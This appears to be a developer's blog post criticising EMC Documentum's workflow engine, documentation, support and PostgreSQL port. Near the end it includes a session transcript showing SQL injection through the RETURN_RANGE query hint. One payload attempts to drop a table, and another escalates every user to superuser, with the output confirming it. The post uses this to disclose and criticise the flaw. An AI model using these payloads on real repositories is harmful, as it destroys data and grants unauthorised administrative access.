The initial idea was to write continuation for Dealing with workflow methods. Part I and Dealing with workflow methods. Part II blogposts, but today I have discovered that topic, I wanted to shed a light on, is already partially but correctly (sic!) covered in EMC’s documentation, because this blog pretends to contain original content only, I decided to not write a continuation for blogpost mentioned above, but instead of that
desecrate Documentum’s corpse share some my observations.
Well, about three weeks ago my former colleague had complained to me about WF_SKIP_PARALLEL_TASK_EXECUTION parameter in dm_docbase_config, the gist of claim was the following: enabling WF_SKIP_PARALLEL_TASK_EXECUTION parameter dramatically increases pauses between two sequential manual workflow activities, actually, it was expressed using obscene language and was bit insulting, because I was a person who initiated the appearance of this parameter in Documentum. The story of this parameter is following: in 2012 we were trying to implement EDMS system based on Documentum in organisation with more than 50000 employees, that solution was initially designed for Documentum 5.3 and had never been running in distributed environment, moreover this solution was containing a lot of workflow templates utilizing following pattern:
Such pattern didn’t have any issues in Documentum 5.3, because in Documentum 5.3 workflow agent was never executing two auto-activities belonging to the same workflow in parallel, but in Documentum 6.7 (here I’m not sure about version, may be it was 6.6 or 6.5) EMC decided to “improve performance” of workflow engine, broke a lot of things, and one of them was a behaviour of workflow agent I described earlier, as the result auto-activities in our workflow templates started to compete for the same objects in database and we started getting a lot of DM_SYSOBJECT_E_VERSION_MISMATCH errors, when we asked support to return behaviour of workflow agent back we got a typical excuse that the new behaviour was correct and we were doing something wrong, the suggestion was to use com.documentum.fc.client.IDfPersistentObject#lock method to prevent DM_SYSOBJECT_E_VERSION_MISMATCH errors, unfortunately com.documentum.fc.client.IDfPersistentObject#lock method is completely unreliable and that time (i.e. in Documentum 6.7) it was not possible to implement controlled locks, so, I was continuing to urge support to return previous behaviour of workflow agent. And finally I had discovered a misbehaviour in workflow engine: when we completing workflow activity (doesn’t matter automatic or not) Content Server creates the next activity and updates dm_workflow object, so, when we simultaneously completing two workflow activities belonging to the same workflow we competing for dm_workflow object and may get DM_OBJ_MGR_E_VERSION_MISMATCH error – it is obviously a bug, but instead of fixing this bug buy putting extra locks on dm_workflow object EMC decided to introduce WF_SKIP_PARALLEL_TASK_EXECUTION parameter, which returns the previous behaviour of workflow agent, additionally I helped them to “fix” behaviour of workflow agent in distributed environment. The weird thing here is that they still not yet fixed workflow engine – WF_SKIP_PARALLEL_TASK_EXECUTION parameter does not prevent DM_OBJ_MGR_E_VERSION_MISMATCH errors in case of manual activities, moreover, now this workaround is enabled by default in Documentum 7.3.
As for my former colleague, I have formed an opinion that his complaints were groundless – who the heck cares about pauses between manual activities in case of production environment? Business users are not robots, they do not complete tasks as quick as thought – a couple of extra minutes won’t make sense, however a couple of extra minutes does make sense for QA team or some demonstration/presentation activities. And in order to prove this opinion I have started googling and have found a really useful document authored by EMC (sic!) – xCP1.6 Performance Tuning Guide (if it is unclear: WF_SKIP_PARALLEL_TASK_EXECUTION parameter disables on-demand processing):
Frankly speaking, this document (xCP1.6 Performance Tuning Guide) has really impressed me, I wouldn’t say that it is perfect but no doubts it is good – there are just a couple of points which require more thorough explanation, some examples:
Why did they suggest to “do not configure more than three threads per CPU core”? I have presented similar considerations in Ingestion rates blogpost: there are three services which perform a task: JMS, Content Server and RDBMS, and when one service waits for response from another one it does not consume CPU. Less obvious statement: “Avoid more than 25 workflow threads for any Content Server”. Why 25? Documentum 6.7 was bundled with 32-bit JDK, more threads on JMS would require more memory, but 32-bit JDK have about 3Gb memory limit.
Please note, that in 2011 xCP 1.6 was a flagman Documentum product, and it’s performance guide contains 90 pages of really useful information, now let’s compare it with flagman products in 2017 – xCP2 and D2:
- xCP2.2 Performance Best Practices and Guidelines – 18 pages, primarily contain “never ever implement features we have sold to you” statements and xml configs
- D2 Goblin Performance Best Practice – 15 (I have divided 30 by 2 due to poor document layout) pages of doubtful statements, for example:
So, it doesn’t matter what operating system you are on and how many memory and CPU cores you have – you can’t serve more than 300 concurrent sessions by a single Content Server instance, what scaling are they talking about? Moreover, this recommendation is based on limitations of 32-bit builds of Content Server, which currently are not supported! How many Content Servers do I need to maintain if I want to implement Documentum solution for organization with 500000 employees? 10? 20? It is unmanageable!
So, what do we have? In 2011 documentation was admissible, in 2016 documentation is extremely poor. Below are my other observations:
In 2012, when we were implementing our “50000 employees” project we had faced with a plenty of stability and performance issues, actually it was hard to imagine that a product with 20 years of history could have such amount of problems, but it did, nevertheless close collaboration with support had provided some benefits: EMC had fixed all showstopper issues (about 20-30% of overall stability and performance issues) and we had gone into production, I wouldn’t say that it was a pleasure to work with EMC support – support guys didn’t understand the obvious things and I wasted a lot of time for explaining how their product worked, for example, implementing of WF_SKIP_PARALLEL_TASK_EXECUTION feature, described earlier, had taken about three months and initially EMC positioned this feature as a workaround, but now it is enabled by default, but it worth to admit that in 2012 support did work, heavily, counterproductive, but did work.
It seems that in 2013 EMC had decided to cut off expenses and started doing weird things: they released D7 only for Linux and Windows, moreover, there was a statement that EMC would support only latests patchset within GA release (i.e. if you are on D6.7 and EMC releases D6.7SP1, D6.7 become unsupported) – extremely good perspective if take into account their release schedule: new release/patchset every year, among with throwing out support of DB2 and Sybase EMC revealed their plans on PostgreSQL, and finally, they announced an era of case management and released xCP2, which was completely unreliable and incompatible with other products. Technically, I would say that all those undertakings got failed, let’s elaborate. The most doubtful thing their is a PostgreSQL build – it has taken three yeas and, according to EMC, 100000 hours of engineering work (as for me it should not take more that 6 months) to release a full-functional PostgreSQL build, but it’s purpose is still obscure, really, I can’t understand EMC’s presuppositions: why did they think that customers who unable to pay for Oracle or MSSQL would prefer Documentum to free Alfresco CE? What is the reason to not support EnterpriseDB, based on PostgreSQL? Why after GA release they do not want to support PostgreSQL build?
Try to describe what is going on this photo:
The answer is following: EMC brought together existing customers and claiming: you know, we had following options to cut off your database licence fees:
- we might to improve performance by two times and, hence, cut off your database licence fees by 50%
- we might to support your databases and cut off your database licence fees by 50%
- implementing both options we might to cut off your database licence fees by 75%
but instead of that, if you want to cut off your database licence fees you need to invest into migration to database, which has no commercial support.
Moreover, I can’t believe that behaviour below is worth “100000 hours of engineering work”, it seems that Documentum was ported to PosgreSQL by PHP-programmers:
Connecting to Server using docbase DCTM_PSQL [DM_SESSION_I_SESSION_START]info: "Session 0102987880002902 started for user dm_bof_registry." Connected to Documentum Server running Release 7.3.0000.0214 Linux64.Postgres -- -- Amount of superusers in Documentum repository -- 1> select count(*) from dm_user where user_privileges=16 2> go count ------------ 1 (1 row affected) -- -- Demonstration or how Content Server translates DQL query to SQL -- 1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;') 2> go [DM_QUERY_E_CURSOR_ERROR]error: "A database error has occurred during the creation of a cursor (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it; Error while executing the query')." 1> exec get_last_sql 2> go result ------------------------------------------------------------------------------------------- select all CAST(count(*) as int) from dm_user_sp dm_user order by 1;drop table dm_user_s; 1321 Commit 1321 Commit (1 row affected) -- -- Exploitation -- 1> select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;update dm_user_s set user_privileges=16;') 2> go count ------------ 67 (1 row affected) -- -- Amount of superusers in Documentum repository after exploitation -- 1> select count(*) from dm_user where user_privileges=16 2> go count ------------ 67 (1 row affected) 1>
xCP2 is also a bizarre marvel: I can’t deny a fact that having a robust platform in product portfolio is a good point, but how EMC was trying to did that raises a lot of questions. At first, if you want to demonstrate strengths of your platform you must to develop a robust OOTB solution, not your xCP 2.2 Tutorial – Concordant Insurance, which covers just a 10% of business needs, but real OOTB solution, unfortunately EMC had another opinion:
Where is an xCP2? It is been almost 4 years since EMC announced general availability of xCP2, but they still not yet adopted it, have you ever seen better advertisement? At second, all successful platforms (except MS Word), I have ever seen, didn’t start their triumphant march from GUI – all of them started from a robust API, but EMC had another vision: at first, we will create a GUI, after that, may be, we will create an API. And at third, it is always a good idea to neglect by wise suggestions (actually, here I’m not sure, because if I think that something should take about 6 months, it real life, from ECD perspective it takes three years) – 2013:
Want to talk about InfoArchive, REST and other technologies? You are welcome 🙂